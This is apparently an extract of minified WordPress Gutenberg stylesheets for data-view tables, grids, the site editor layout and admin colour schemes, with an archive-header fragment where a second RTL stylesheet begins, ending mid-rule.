.components-checkbox-control__input,.dataviews-view-table tr.is-hovered .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:focus-within .components-checkbox-control__input,.dataviews-view-table tr:focus-within .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:hover .components-checkbox-control__input,.dataviews-view-table tr:hover .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){opacity:1}@media (hover:none){.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input,.dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){opacity:1}}.dataviews-view-table tr.is-selected{background-color:rgba(var(--wp-admin-theme-color--rgb),.04);color:#757575}.dataviews-view-table tr.is-selected,.dataviews-view-table tr.is-selected+tr{border-top:1px solid rgba(var(--wp-admin-theme-color--rgb),.12)}.dataviews-view-table tr.is-selected:hover{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-view-table tr.is-selected .dataviews-view-table__actions-column--sticky{background-color:color-mix(in srgb,rgb(var(--wp-admin-theme-color--rgb)) 4%,#fff)}.dataviews-view-table tr.is-selected:hover .dataviews-view-table__actions-column--sticky{background-color:color-mix(in srgb,rgb(var(--wp-admin-theme-color--rgb)) 8%,#fff)}.dataviews-view-table thead{inset-block-start:0;position:sticky;z-index:1}.dataviews-view-table thead tr{border:0}.dataviews-view-table thead tr .components-checkbox-control__input.components-checkbox-control__input{opacity:1}.dataviews-view-table thead th{background-color:#fff;font-size:11px;font-weight:500;padding-bottom:8px;padding-left:12px;padding-top:8px;text-transform:uppercase}.dataviews-view-table thead th:has(.dataviews-view-table-header-button):not(:first-child){padding-left:4px}.dataviews-view-table tbody td{vertical-align:top}.dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper{align-items:center;display:flex;min-height:32px;white-space:nowrap}.dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-end{justify-content:flex-end}.dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-center{justify-content:center}.dataviews-view-table tbody .components-v-stack>.dataviews-view-table__cell-content-wrapper:not(:first-child){min-height:0}.dataviews-view-table .dataviews-view-table-header-button{font-size:11px;font-weight:500;padding:4px 8px;text-transform:uppercase}.dataviews-view-table .dataviews-view-table-header-button:not(:hover){color:#1e1e1e}.dataviews-view-table .dataviews-view-table-header-button span{speak:none}.dataviews-view-table .dataviews-view-table-header-button span:empty{display:none}.dataviews-view-table .dataviews-view-table-header{padding-left:4px}.dataviews-view-table .dataviews-view-table__actions-column{white-space:nowrap;width:auto}.dataviews-view-table:has(tr.is-selected) .components-checkbox-control__input{opacity:1}.dataviews-view-table.has-compact-density thead th:has(.dataviews-view-table-header-button):not(:first-child){padding-left:0}.dataviews-view-table.has-compact-density td,.dataviews-view-table.has-compact-density th{padding:4px 8px}.dataviews-view-table.has-comfortable-density td,.dataviews-view-table.has-comfortable-density th{padding:16px 12px}.dataviews-view-table.has-comfortable-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-comfortable-density th.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density th.dataviews-view-table__checkbox-column{padding-right:0}@container (max-width: 430px){.dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{padding-left:24px}.dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{padding-right:24px}}.dataviews-view-table-selection-checkbox{--checkbox-input-size:24px}@media (min-width:600px){.dataviews-view-table-selection-checkbox{--checkbox-input-size:16px}}.dataviews-column-primary__media{background-color:#fff;border-radius:4px;flex-shrink:0;max-width:60px;overflow:hidden;position:relative}.dataviews-column-primary__media img{height:100%;object-fit:cover;width:100%}.dataviews-column-primary__media:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;left:0;position:absolute;top:0;width:100%}.dataviews-view-table__cell-content-wrapper:not(.dataviews-column-primary__media),.dataviews-view-table__primary-column-content:not(.dataviews-column-primary__media){max-width:80ch;min-width:15ch}.dataviews-view-table__group-header-row .dataviews-view-table__group-header-cell{color:#1e1e1e;font-weight:500;padding:12px 48px}.dataviews-view-table col[class^=dataviews-view-table__col-]:not(.dataviews-view-table__col-primary){width:1%}.dataviews-view-picker-grid .dataviews-view-picker-grid__card{height:100%;justify-content:flex-start;position:relative}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-actions{padding:8px 0 4px}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field{align-content:center;min-height:24px;overflow:hidden;text-align:start}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field--clickable{width:fit-content}.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{color:#1e1e1e}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after,.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.dataviews-view-picker-grid:focus-visible[aria-activedescendant]{outline:none}.dataviews-view-picker-grid:focus-visible [data-active-item=true]{outline:2px solid var(--wp-admin-theme-color)}.dataviews-view-picker-grid .dataviews-selection-checkbox{top:8px!important}.dataviews-view-picker-grid .dataviews-selection-checkbox input{pointer-events:none}.dataviews-view-picker-grid .dataviews-view-picker-grid__media{aspect-ratio:1/1;background-color:#fff;border-radius:4px;position:relative;width:100%}.dataviews-view-picker-grid .dataviews-view-picker-grid__media img{height:100%;object-fit:cover;width:100%}.dataviews-view-picker-grid .dataviews-view-picker-grid__media:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;left:0;pointer-events:none;position:absolute;top:0;width:100%}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields{font-size:12px;line-height:16px;position:relative}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields:not(:empty){padding:0 0 12px}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field-value:not(:empty){line-height:20px;min-height:24px;padding-top:2px}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field{align-items:center;min-height:24px}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-name{color:#757575;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:35%}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:65%}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field:not(:has(.dataviews-view-picker-grid__field-value:not(:empty))){display:none}.dataviews-view-picker-grid .dataviews-view-picker-grid__badge-fields:not(:empty){padding-bottom:12px}.dataviews-view-picker-grid__field-value:empty,.dataviews-view-picker-grid__field:empty{display:none}.dataviews-view-picker-grid__card .dataviews-selection-checkbox{left:8px;position:absolute;top:-9999em;z-index:1}@media (hover:none){.dataviews-view-picker-grid__card .dataviews-selection-checkbox{top:8px}}.dataviews-view-picker-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:hover .dataviews-selection-checkbox{top:8px}.dataviews-view-picker-grid__media--clickable{cursor:pointer}.dataviews-view-picker-grid-group__header{color:#1e1e1e;font-size:15px;font-weight:500;margin:0 0 8px;padding:0 48px}.dataviews-controls__datetime{border:none;padding:0}.dataviews-controls__relative-date-number,.dataviews-controls__relative-date-unit{flex:1 1 50%}.dataviews-controls__date input[type=date]::-webkit-calendar-picker-indicator,.dataviews-controls__date input[type=date]::-webkit-inner-spin-button{-webkit-appearance:none;display:none}.dataviews-controls__date-preset{border:1px solid #ddd}.dataviews-controls__date-preset:active{background-color:#000}.dataforms-layouts-panel__field{align-items:flex-start!important;justify-content:flex-start!important;min-height:32px;width:100%}.dataforms-layouts-panel__field-label{align-items:center;display:flex;flex-shrink:0;hyphens:auto;line-height:20px;min-height:32px;width:38%}.dataforms-layouts-panel__field-label--label-position-side{align-self:center}.dataforms-layouts-panel__field-control{align-items:center;display:flex;flex-grow:1;min-height:32px}.dataforms-layouts-panel__field-control .components-button{max-width:100%;min-height:32px;text-align:left;text-wrap:balance;text-wrap:pretty;white-space:normal}.dataforms-layouts-panel__field-control.components-button.is-link[aria-disabled=true]{text-decoration:none}.dataforms-layouts-panel__field-control .components-dropdown{max-width:100%}.dataforms-layouts-panel__field-dropdown .components-popover__content{min-width:320px;padding:16px}.dataforms-layouts-panel__dropdown-header{margin-bottom:16px}.dataforms-layouts-panel__modal-footer{margin-top:16px}.components-popover.components-dropdown__content.dataforms-layouts-panel__field-dropdown{z-index:159990}.dataforms-layouts-regular__field{align-items:flex-start!important;justify-content:flex-start!important;min-height:32px;width:100%}.dataforms-layouts-regular__field-label{align-items:center;display:flex;flex-shrink:0;hyphens:auto;line-height:20px;min-height:32px;width:38%}.dataforms-layouts-regular__field-label--label-position-side{align-self:center}.dataforms-layouts-regular__field-control{align-items:center;display:flex;flex-grow:1;min-height:32px}.dataforms-layouts-card__field-header-label{font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:15px;font-weight:500;line-height:20px}.dataforms-layouts-card__field{width:100%}.dataforms-layouts-card__field-description{color:#757575;display:block;font-size:13px;margin-bottom:16px}.dataforms-layouts-card__field-summary{display:flex;flex-direction:row;gap:16px}.dataforms-layouts-row__field-control{width:100%}.dataforms-layouts__wrapper{font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px}.edit-site-layout{color:#ccc;display:flex;flex-direction:column;height:100%}.edit-site-layout,.edit-site-layout:not(.is-full-canvas) .editor-visual-editor{background:#1e1e1e}.edit-site-layout__content{display:flex;flex-grow:1;height:100%}.edit-site-layout__sidebar-region{flex-shrink:0;width:100vw;z-index:1}@media (min-width:782px){.edit-site-layout__sidebar-region{width:300px}}.edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region{height:100vh;left:0;position:fixed!important;top:0}.edit-site-layout__sidebar-region .edit-site-layout__sidebar{display:flex;flex-direction:column;height:100%}.edit-site-layout__sidebar-region .resizable-editor__drag-handle{right:0}.edit-site-layout__main{display:flex;flex-direction:column;flex-grow:1;overflow:hidden}.edit-site-layout__mobile{display:flex;flex-direction:column;position:relative;width:100%;z-index:2}.edit-site-layout__mobile .edit-site-sidebar__screen-wrapper{padding:0}.edit-site-layout__mobile .edit-site-sidebar-navigation-screen__main{padding:0 12px}.edit-site-layout__canvas-container{flex-grow:1;overflow:visible;position:relative;z-index:2}.edit-site-layout__canvas-container.is-resizing:after{bottom:0;content:"";left:0;position:absolute;right:0;top:0;z-index:100}.edit-site-layout__canvas{align-items:center;bottom:0;display:flex;justify-content:center;left:0;position:absolute;top:0;width:100%}.edit-site-layout__canvas.is-right-aligned{justify-content:flex-end}.edit-site-layout__canvas .edit-site-resizable-frame__inner{color:#1e1e1e}@media (min-width:782px){.edit-site-layout__canvas{bottom:16px;top:16px;width:calc(100% - 16px)}.edit-site-layout__canvas .edit-site-resizable-frame__inner-content{box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003;overflow:hidden}}@media (min-width:782px) and (not (prefers-reduced-motion)){.edit-site-layout__canvas .edit-site-resizable-frame__inner-content{transition:border-radius,box-shadow .4s}}@media (min-width:782px){.edit-site-layout:not(.is-full-canvas) .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{border-radius:8px}.edit-site-layout__canvas .edit-site-resizable-frame__inner-content:hover{box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005}}.edit-site-layout.is-full-canvas .edit-site-layout__canvas{bottom:0;top:0;width:100%}.edit-site-layout__canvas .interface-interface-skeleton,.edit-site-layout__mobile .interface-interface-skeleton,.edit-site-template-pages-preview .interface-interface-skeleton{min-height:100%!important;position:relative!important}.edit-site-template-pages-preview{height:100%}html.canvas-mode-edit-transition::view-transition-group(toggle){animation-delay:255ms}@media (prefers-reduced-motion){::view-transition-group(*),::view-transition-new(*),::view-transition-old(*){animation:none!important}}.edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region .edit-site-layout__view-mode-toggle{display:none}.edit-site-layout__view-mode-toggle.components-button{view-transition-name:toggle;align-items:center;background:#1e1e1e;border-radius:0;color:#fff;display:flex;height:64px;justify-content:center;overflow:hidden;padding:0;position:relative;width:64px}.edit-site-layout__view-mode-toggle.components-button:active,.edit-site-layout__view-mode-toggle.components-button:hover{color:#fff}.edit-site-layout__view-mode-toggle.components-button:focus,.edit-site-layout__view-mode-toggle.components-button:focus-visible{box-shadow:0 0 0 3px #1e1e1e,0 0 0 6px var(--wp-admin-theme-color);outline:4px solid #0000;outline-offset:4px}.edit-site-layout__view-mode-toggle.components-button:before{border-radius:4px;bottom:9px;box-shadow:none;content:"";display:block;left:17px;position:absolute;right:9px;top:9px}@media not (prefers-reduced-motion){.edit-site-layout__view-mode-toggle.components-button:before{transition:box-shadow .1s ease}}.edit-site-layout__view-mode-toggle.components-button .edit-site-layout__view-mode-toggle-icon{align-items:center;display:flex;height:64px;justify-content:center;width:64px}.edit-site-layout__actions{background:#fff;bottom:auto;color:#1e1e1e;left:auto;position:fixed!important;right:0;top:-9999em;width:280px;z-index:100000}.edit-site-layout__actions:focus,.edit-site-layout__actions:focus-within{bottom:0;top:auto}.edit-site-layout__actions.is-entity-save-view-open:focus,.edit-site-layout__actions.is-entity-save-view-open:focus-within{top:0}@media (min-width:782px){.edit-site-layout__actions{border-left:1px solid #ddd}}.edit-site-layout__area{box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003;flex-grow:1;margin:0;overflow:hidden}@media (min-width:782px){.edit-site-layout__area{border-radius:8px;margin:16px 16px 16px 0}}.edit-site .components-editor-notices__snackbar{bottom:16px;padding-left:16px;padding-right:16px;position:fixed;right:0}.edit-site-save-hub{border-top:1px solid #2f2f2f;color:#949494;flex-shrink:0;margin:0;padding:16px}.edit-site-save-hub__button{color:inherit;justify-content:center;width:100%}.edit-site-save-hub__button[aria-disabled=true]{opacity:1}.edit-site-save-hub__button[aria-disabled=true]:hover{color:inherit}.edit-site-save-hub__button:not(.is-primary).is-busy,.edit-site-save-hub__button:not(.is-primary).is-busy[aria-disabled=true]:hover{color:#1e1e1e}@media (min-width:600px){.edit-site-save-panel__modal{width:600px}}.edit-site-sidebar__content{contain:content;flex-grow:1;overflow-x:hidden;overflow-y:auto}@keyframes local--slide-from-right{0%{opacity:0;transform:translateX(50px)}to{opacity:1;transform:none}}@keyframes local--slide-from-left{0%{opacity:0;transform:translateX(-50px)}to{opacity:1;transform:none}}.edit-site-sidebar__screen-wrapper{overflow-x:auto}.edit-site-sidebar__screen-wrapper::-webkit-scrollbar{height:12px;width:12px}.edit-site-sidebar__screen-wrapper::-webkit-scrollbar-track{background-color:initial}.edit-site-sidebar__screen-wrapper::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.edit-site-sidebar__screen-wrapper:focus-within::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:focus::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:hover::-webkit-scrollbar-thumb{background-color:#757575}.edit-site-sidebar__screen-wrapper{scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin}.edit-site-sidebar__screen-wrapper:focus,.edit-site-sidebar__screen-wrapper:focus-within,.edit-site-sidebar__screen-wrapper:hover{scrollbar-color:#757575 #0000}.edit-site-sidebar__screen-wrapper{will-change:transform}@media (hover:none){.edit-site-sidebar__screen-wrapper{scrollbar-color:#757575 #0000}}.edit-site-sidebar__screen-wrapper{animation-duration:.14s;animation-timing-function:ease-in-out;display:flex;flex-direction:column;height:100%;max-height:100%;padding:0 12px;scrollbar-gutter:stable;will-change:transform,opacity}@media (prefers-reduced-motion:reduce){.edit-site-sidebar__screen-wrapper{animation-duration:0s}}.edit-site-sidebar__screen-wrapper.slide-from-left{animation-name:local--slide-from-left}.edit-site-sidebar__screen-wrapper.slide-from-right{animation-name:local--slide-from-right}.edit-site-site-hub{align-items:center;display:flex;gap:8px;height:64px;justify-content:space-between;margin-right:12px}.edit-site-site-hub__actions{flex-shrink:0}.edit-site-site-hub__view-mode-toggle-container{flex-shrink:0;height:64px;width:64px}.edit-site-site-hub__view-mode-toggle-container.has-transparent-background .edit-site-layout__view-mode-toggle-icon{background:#0000}.edit-site-site-hub__title .components-button{color:#e0e0e0;display:block;flex-grow:1;font-size:15px;font-weight:500;margin-left:-4px;overflow:hidden;padding-right:16px;position:relative;text-decoration:none;text-overflow:ellipsis;white-space:nowrap}.edit-site-site-hub__title .components-button:active,.edit-site-site-hub__title .components-button:focus,.edit-site-site-hub__title .components-button:hover{color:#e0e0e0}.edit-site-site-hub__title .components-button:focus{box-shadow:none;outline:none}.edit-site-site-hub__title .components-button:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #1e1e1e,0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color);outline:2px solid #0000;outline-offset:2px}.edit-site-site-hub__title .components-button:after{content:"↗";font-weight:400;opacity:0;position:absolute;right:0}@media not (prefers-reduced-motion){.edit-site-site-hub__title .components-button:after{transition:opacity .1s linear}}.edit-site-site-hub__title .components-button:active:after,.edit-site-site-hub__title .components-button:focus:after,.edit-site-site-hub__title .components-button:hover:after{opacity:1}.edit-site-site-hub_toggle-command-center{color:#e0e0e0}.edit-site-site-hub_toggle-command-center:active svg,.edit-site-site-hub_toggle-command-center:hover svg{fill:#f0f0f0}.edit-site-site-icon__icon{fill:currentColor;height:100%;width:100%}.edit-site-layout.is-full-canvas .edit-site-site-icon__icon{padding:12px}.edit-site-site-icon__image{aspect-ratio:1/1;background:#333;height:100%;object-fit:cover;width:100%}.edit-site-layout.is-full-canvas .edit-site-site-icon__image{border-radius:0}.edit-site-editor__view-mode-toggle button:focus{position:relative}.edit-site-editor__view-mode-toggle button:focus:before{bottom:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color),inset 0 0 0 calc(1px + var(--wp-admin-border-width-focus)) #fff;content:"";display:block;left:0;position:absolute;right:0;top:0;z-index:1}.edit-site-editor-canvas-container{background-color:var(--wp-editor-canvas-background);height:100%}.edit-site-editor-canvas-container iframe{display:block;height:100%;width:100%}.edit-site-layout.is-full-canvas .edit-site-editor-canvas-container{padding:24px 24px 0}.edit-site-editor-canvas-container__section{background:#fff;border-radius:8px;bottom:0;left:0;overflow:hidden;position:absolute;right:0;top:0}@media not (prefers-reduced-motion){.edit-site-editor-canvas-container__section{transition:all .3s}}.edit-site-editor-canvas-container__close-button{background:#fff;position:absolute;right:8px;top:8px;z-index:2}.edit-site-post-list__featured-image{height:100%;object-fit:cover;width:100%}.edit-site-post-list__featured-image-wrapper{border-radius:4px;height:100%;width:100%}.edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)){background-color:#f0f0f0;border-radius:4px;display:block;flex-grow:0!important;height:32px;overflow:hidden;position:relative;width:32px}.edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button:after,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)):after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;left:0;position:absolute;top:0;width:100%}.edit-site-post-list__featured-image-button{background-color:unset;border:none;border-radius:4px;box-shadow:none;box-sizing:border-box;cursor:pointer;height:100%;overflow:hidden;padding:0;width:100%}.edit-site-post-list__featured-image-button:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-view-grid__card.is-selected .edit-site-post-list__featured-image-button:after{background:rgba(var(--wp-admin-theme-color--rgb),.04);box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.edit-site-post-list__status-icon{height:24px;width:24px}.edit-site-post-list__status-icon svg{fill:currentColor;margin-left:-4px}.edit-site-resizable-frame__inner{position:relative}body:has(.edit-site-resizable-frame__inner.is-resizing){cursor:col-resize;user-select:none;-webkit-user-select:none}.edit-site-resizable-frame__inner.is-resizing:before{content:"";inset:0;position:absolute;z-index:1}.edit-site-resizable-frame__inner-content{inset:0;position:absolute;z-index:0}.edit-site-resizable-frame__handle{align-items:center;background-color:#75757566;border:0;border-radius:4px;cursor:col-resize;display:flex;height:64px;justify-content:flex-end;padding:0;position:absolute;top:calc(50% - 32px);width:4px;z-index:100}.edit-site-resizable-frame__handle:before{content:"";height:100%;left:100%;position:absolute;width:32px}.edit-site-resizable-frame__handle:after{content:"";height:100%;position:absolute;right:100%;width:32px}.edit-site-resizable-frame__handle:focus-visible{outline:2px solid #0000}.edit-site-resizable-frame__handle.is-resizing,.edit-site-resizable-frame__handle:focus,.edit-site-resizable-frame__handle:hover{background-color:var(--wp-admin-theme-color)}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}#adminmenumain,#wpadminbar{display:none}#wpcontent{margin-left:0}body.js #wpbody{padding-top:0}body{background:#fff}body #wpcontent{padding-left:0}body #wpbody-content{padding-bottom:0}body #wpbody-content>div:not(#gutenberg-posts-dashboard):not(#screen-meta),body #wpfooter{display:none}body .a11y-speak-region{left:-1px;top:-1px}body ul#adminmenu a.wp-has-current-submenu:after,body ul#adminmenu>li.current>a.current:after{border-right-color:#fff}body .media-frame select.attachment-filters:last-of-type{max-width:100%;width:auto}#gutenberg-posts-dashboard{box-sizing:border-box}#gutenberg-posts-dashboard *,#gutenberg-posts-dashboard :after,#gutenberg-posts-dashboard :before{box-sizing:inherit}#gutenberg-posts-dashboard{height:100vh}@media (min-width:600px){#gutenberg-posts-dashboard{bottom:0;left:0;min-height:100vh;position:fixed;right:0;top:0}}.no-js #gutenberg-posts-dashboard{min-height:0;position:static}#gutenberg-posts-dashboard .components-editor-notices__snackbar{bottom:16px;padding-left:16px;padding-right:16px;position:fixed;right:0}PK!Faa dist/edit-site/posts-rtl.min.cssnuȯ@charset "UTF-8";:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.admin-ui-page{background-color:#fff;color:#2f2f2f;container:admin-ui-page/inline-size;display:flex;flex-flow:column;height:100%;position:relative;z-index:1}@media not (prefers-reduced-motion){.admin-ui-page{transition:width .2s ease-out}}.admin-ui-page__header{background:#fff;border-bottom:1px solid #f0f0f0;padding:16px 48px;position:sticky;top:0}@container (max-width: 430px){.admin-ui-page__header{padding:16px 24px}}.admin-ui-page__header-subtitle{color:#757575;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px;margin:0;padding-block-end:8px}.admin-ui-page__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto}.admin-ui-page__content.has-padding{padding:16px 20px}@container (max-width: 430px){.admin-ui-page__content.has-padding{padding:16px 24px}}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{padding:0 8px;width:auto}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{display:none}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{content:attr(aria-label);font-size:12px}.dataviews-picker-wrapper,.dataviews-wrapper{box-sizing:border-box;container:dataviews-wrapper/inline-size;display:flex;flex-direction:column;font-size:13px;height:100%;line-height:1.4;overflow:auto;scroll-padding-bottom:64px}.dataviews-filters__container,.dataviews__view-actions{box-sizing:border-box;flex-shrink:0;padding:16px 48px;position:sticky;right:0}@media not (prefers-reduced-motion){.dataviews-filters__container,.dataviews__view-actions{transition:padding .1s ease-out}}.dataviews-loading,.dataviews-no-results{align-items:center;display:flex;flex-grow:1;justify-content:center;padding:0 48px}@media not (prefers-reduced-motion){.dataviews-loading,.dataviews-no-results{transition:padding .1s ease-out}}.dataviews-loading-more{text-align:center}@container (max-width: 430px){.dataviews-filters__container,.dataviews__view-actions{padding:12px 24px}.dataviews-loading,.dataviews-no-results{padding-left:24px;padding-right:24px}}.dataviews-title-field{font-size:13px;font-weight:500;width:100%}.dataviews-title-field,.dataviews-title-field a{color:#2f2f2f;text-overflow:ellipsis;white-space:nowrap}.dataviews-title-field a{display:block;flex-grow:0;overflow:hidden;text-decoration:none}.dataviews-title-field a:hover{color:var(--wp-admin-theme-color)}.dataviews-title-field a:focus{border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus) 